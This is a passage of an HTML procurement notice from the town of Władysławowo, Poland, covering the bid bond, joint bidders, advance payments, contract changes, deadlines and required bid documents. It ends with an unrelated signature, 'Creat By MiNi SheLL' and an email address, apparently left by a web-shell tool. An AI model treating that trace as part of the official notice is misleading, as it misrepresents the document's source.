jego<br/>uzupełnienia (art. 107 ust. 2 ustawy Pzp). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 30 000,00 (słownie: trzydzieści tysięcy<br/>złotych 00/100 złotych). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni wykonawcy zgodnie z Załącznikiem nr 3 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Zamawiający, po przekazaniu terenu robót, udzieli Wykonawcy zaliczki na poczet wykonania przedmiotu umowy w<br/>kwocie nie mniejszej niż 5% wynagrodzenia Wykonawcy.<br/>2. Zamawiający przewiduje udzielenie kolejnych zaliczek, pod warunkiem że Wykonawca wykaże, iż wykonał zamówienie w<br/>zakresie wartości poprzednio udzielanych zaliczek.<br/>3. Pozostała część wynagrodzenia Wykonawcy będzie wypłacona po zakończeniu realizacji inwestycji, tj. po dokonaniu<br/>odbioru końcowego robót oraz ostatecznym rozliczeniu zaliczek, z zastrzeżeniem że kwota wynagrodzenia płatnego po<br/>zakończeniu inwestycji nie może być mniejsza niż kwota dofinansowania inwestycji, przyznanego Zamawiającemu z<br/>Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych.<br/>4. Łączna kwota zaliczek - do 25% wynagrodzenia Wykonawcy.<br/>5. Płatność każdej kolejnej zaliczki udzielanej przez Zamawiającego nastąpi dopiero po wykonaniu przez Wykonawcę<br/>świadczeń na wartość nie mniejszą niż wartość zaliczki uprzednio udzielonej.<br/>6. Podstawą rozliczenia udzielonych zaliczek będą protokoły odbioru robót, potwierdzające że Wykonawca wykonał<br/>zamówienie w zakresie wartości udzielonej zaliczki.<br/>7. Udzielenie pierwszej i każdej kolejnej zaliczki możliwe jest jedynie po uprzednim wniesieniu przez Wykonawcę<br/>zabezpieczenia zwrotu zaliczki w formie gwarancji bankowej lub ubezpieczeniowej w wysokości 100% wartości udzielanej<br/>zaliczki. Okres obowiązywania zabezpieczenia każdej zaliczki obejmuje termin liczony od dnia złożenia w siedzibie<br/>Zamawiającego do dnia wykonania umowy określonego w przyszłej Umowie zwiększony o 25 dni roboczych od daty<br/>wykonania przedmiotu umowy.<br/>8. Zabezpieczenie zaliczki wnosi się poprzez złożenie w oryginale dokumentu w Urzędzie Miejskim we Władysławowie (84-<br/>120), przy ul. Gen. J. Hallera 19, w miejscu: Referat Inwestycji i Gospodarki Komunalnej, pok. 307.<br/>9. Zaliczka zostanie wpłacona na konto wskazane przez Wykonawcę w terminie 14 dni od dnia otrzymania prawidłowo<br/>wystawionej faktury zaliczkowej po uprzednim wniesieniu zabezpieczenia, o którym mowa w ust. 7.<br/>10. Pozostała do zapłaty cena będzie zapłacona w oparciu o prawidłowo wystawioną przez WYKONAWCĘ fakturę końcową<br/>po dokonaniu protokolarnego odbioru przedmiotu umowy bez zastrzeżeń w terminie 35 dni od dnia odbioru inwestycji.<br/>11. Protokolarny odbiór będzie podstawą do zwrotu zabezpieczenia zaliczki.<br/>12. Szczegółowe postanowienia dot. udzielenia i rozliczenia zaliczki/zaliczek określa Wzór umowy stanowiący załącznik nr 5<br/>do SWZ. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ZAMAWIAJĄCY przewiduje możliwość wprowadzenia istotnych zmian postanowień niniejszej umowy, polegających na:<br/>1) zmianie terminu zakończenia realizacji przedmiotu umowy,<br/>2) zmianie wynagrodzenia,<br/>3) zmianie sposobu spełnienia świadczenia,<br/>4) zmianie osób sprawujących samodzielne funkcje techniczne. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę nalezy złożyć na Platformie Zamawiającego pod adresem: https://wladyslawowo.ezamawiający.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-01 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na Platformie w zakładce „OFERTY” – poprzez wybranie polecenia „Dodaj dokument, wykonawca zobowiązany jest do złożenia:<br/>1) FORMULARZA OFERTY - zgodnie z Załącznikiem nr 1 do SWZ<br/>2) W przypadku gdy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego, wykonawca składa OŚWIADCZENIE, w którym wskazuje.:<br/>- nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>- wartość towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez kwoty podatku;<br/>- stawkę podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie miała zastosowanie.<br/>3) WYKAZ ROZWIĄZAŃ RÓWNOWAŻNYCH– jeżeli Wykonawca przewiduje ich zastosowanie (w przypadku, o którym mowa w Rozdziale IV ust. 7 SWZ) oraz dokumenty na potwierdzenie równoważności zastosowanych rozwiązań (jeżeli są konieczne do wykazania równoważności). Jeżeli złożony wykaz rozwiązań równoważnych będzie niekompletny, Zamawiający wezwie Wykonawcę do jego uzupełnienia (art. 107 ust. 2 ustawy Pzp). <br/>4) OŚWIADCZENIE WYKONAWCY, o którym mowa w Rozdziale X ust. 1 SWZ, potwierdzające brak podstaw wykluczenia Wykonawcy oraz spełnienie warunków udziału w postępowaniu; <br/>5)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy) - OŚWIADCZENIE, o którym mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>6)	w przypadku podmiotu udostępniającego zasoby (jeżeli dotyczy) - OŚWIADCZENIE, o którym mowa w Rozdziale X ust. 1 SWZ, składa podmiot udostępniający zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z katalogiem dokumentów określonych w Rozdziale X SWZ.<br/>7) OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA z art. 117 ust. 4 Pzp zgodnie z Załącznikiem nr 3 do SWZ.<br/>8) ZOBOWIĄZANIE INNEGO PODMIOTU (udostępniającego zasoby), o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>9) DOWÓD WNIESIENIA WADIUM. W przypadku wnoszenia wadium w formie poręczenia lub gwarancji, wykonawca składa oryginał dokumentu wadialnego (poręczenia lub gwarancji), opatrzonego podpisem elektronicznym osób upoważnionych do jego wystawienia;<br/>10) W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - ODPIS LUB INFORMACJĘ Z KRAJOWEGO REJESTRU SĄDOWEGO, CENTRALNEJ EWIDENCJI I INFORMACJI O DZIAŁALNOŚCI GOSPODARCZEJ lub INNEGO WŁAŚCIWEGO REJESTRU;<br/>11) Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 10 - pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy;<br/>12)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com